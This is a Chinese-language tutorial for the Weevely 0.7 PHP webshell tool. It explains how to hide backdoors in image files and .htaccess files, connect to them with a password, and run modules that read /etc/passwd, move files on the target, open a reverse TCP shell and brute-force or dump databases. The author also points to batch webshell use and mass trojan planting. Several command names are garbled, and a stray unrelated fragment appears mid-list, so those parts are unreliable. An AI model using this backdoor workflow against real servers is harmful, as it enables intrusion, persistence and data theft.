Weevely-0.7(php菜⼑)⼯具使⽤详解
-generate.img
-weevel generate.img <password> <img> [<floder_path>]
-在指定路径下⽣成插⼊后门代码后的图⽚⽂件以及使该后门可⽤的.htaccess配置⽂件,使⽤该图⽚后门需要⽬标服务器开启.htaccess,因为该后门依赖于在.htaccess中使web服务器对图⽚⽂件进⾏php解析(AddType application/x-httpd-php .jpg|.png|…)
-generate.htaccess
-weevely generate.htaccess <password> [<path>]
-在指定路径下⽣成.htaccess后门⽂件,该后门需要使⽤同样需要服务器开启.htaccess。⽣成的.htaccess⾥包含了php后门语句,同时使⽤相关配置使得web服务器对该⽂件进⾏php解析
后门连接(依次将上⾯⽣成的3种后门传⾄本地服务器根⽬录进⾏测试)
-weevel <url> <password>
-使⽤所设置的密码连接所给的后门url,连接成功后,会将连接配置信息以session⽂件的形式保存在本地,下次需要再次连接时可直接读取session⽂件进⾏连接(weevely session <session_path>)
1、直接连接由weevely⽣成的.php后门
2、连接由wevely⽣成的图⽚型后门
⾸先,得开启web服务器的.htaccess⽀持(Kali下开启.htaccess⽀持,apache配置⽂件路径:/etc/apache2/sites-enabled/000-default)
重启web服务器
然后将⽣成的后门图⽚和相应的.htaccess配置添加⾄web服务器中,最后使⽤密码直接连接图⽚url即可
3、连接由weevely⽣成的.htaccess后门⽂件
要连接.htaccess同样需要⽬标web服务开启.htaccess,测试配置见上⼀项,这⾥直接将⽣成的.htaccess传⾄站点根⽬录,然后使⽤密码连接后门
-命令
利⽤后门执⾏命令有很多⽅法,可以通过在连接时直接带上命令直接执⾏,也可以单独使⽤weevely连接后门在客户端的环境下执⾏命令。(直接命令执⾏有助于批量webshell处理,批量挂马或者操作等等)下⾯对常⽤命令进⾏演⽰
直接命令执⾏
类交互式shell(相当于菜⼑下的虚拟终端)
在虚拟终端模式下需要使⽤模块直接在前⾯加上 ’:’ 即可
-audit.userfiles
-枚举⽤户⽬录下的具有权限的⽂件(可加载⽤户字典),默认情况下字典很⼩(注意:该模块⽬前只⽀持linux,windows不⽀持)
-audit.systemfiles [logs|root|home|…]
-枚举各种系统⽬录并寻可读写的⽬录,模块仅默认搜索部分linux下的常见⽬录,logs、root、home等等(注意:该模块也仅⽀持linux,windows不⽀持)
-audit.phpconf
-查看php配置信息
-passwd [-real]
-查看/etc/passwd⽂件(特殊说明:很多命令的-vector参数是⽤以指定php执⾏命令函数的,当默认函数不可⽤是,使⽤该参数来尝试指定其他命令执⾏函数来获取信息),同时也可使⽤-real参数来过滤出真实⽤户
-audit.mapwebfiles
-从制定url开始爬取⽬标站点结构,可⽤-depth参数来指定爬取深度
-shell.sh/shell.php
-利⽤接⼝执⾏命令,和虚拟终端类似,这⾥就不给演⽰了
-system.info
-在weevely⾥⽐较由⽤的⼀个模块,可以获取到系统的基本信息
-verstcp host port [-vector]
-反弹⼀个tcp shell到⽬标端⼝(同样也可指定向量:选择反弹shell的形式,nc,perl,ruby等)
-p -port <listen_port> -no-connect [-vector]
-在本地打开⼀个端⼝,等待连接(查看了该模块的源码,使⽤时必须带上-no-connect才能监听成功,负责他会在本地形成⼀个tcp环路)
-net.ifaces目前行的php开发工具有
-查看⽹络ip地址
-file.upload lpath rpath
-上传本地⽂件到⽬标站点指定路径
- filename [-recursive] [-vector]
-删除指定⽂件,可开启安全确认模式
-file.check
-⽤以检查⽬标站点下⽂件的状态(md5值,⼤⼩,权限等)
-file.download rpath lpath [-vector]
-将⽬标站点上的⽂件下载到本地(可⽤于批量会话操作)
-file.edit filename
-对指定⽂件进⾏编辑
-ad filename
-读取指定⽂件内容
-file.ls path
-列觉指定路径的⽂件信息
-file.upload2web
-将本地⽂件上传⾄⽬标站点⽂件夹(可⾃动枚举到⼀个可写⽬录将其写⼊)-file.webdownload <webfile_path> filename
-从其他服务器上下载⽂件到⽬标站点
-uch rpath
-创建⼀个新⽂件
下⾯⼏个命令由于环境限制,没有进⾏测试,这⾥就不再啰嗦了
-bruteforce.sql(爆破指定数据库⽤户名密码)
-bruteforce.sqlusers(爆破所有数据库⽤户密码)
-sql.dump(脱裤,你懂的 ^_^)
-sole(sql交互式终端)
-net.scan(端⼝扫描,不太会⽤)
-find.perms(搜索具有读、写、执⾏权限的⽂件,好像⽐较给⼒)
-find.suidsgid(搜索linux具有suid或者sgid标记的⽂件)
-find.name(查某⽂件或者⽂件夹)
此⽂旨在科普,⼤⽜勿喷~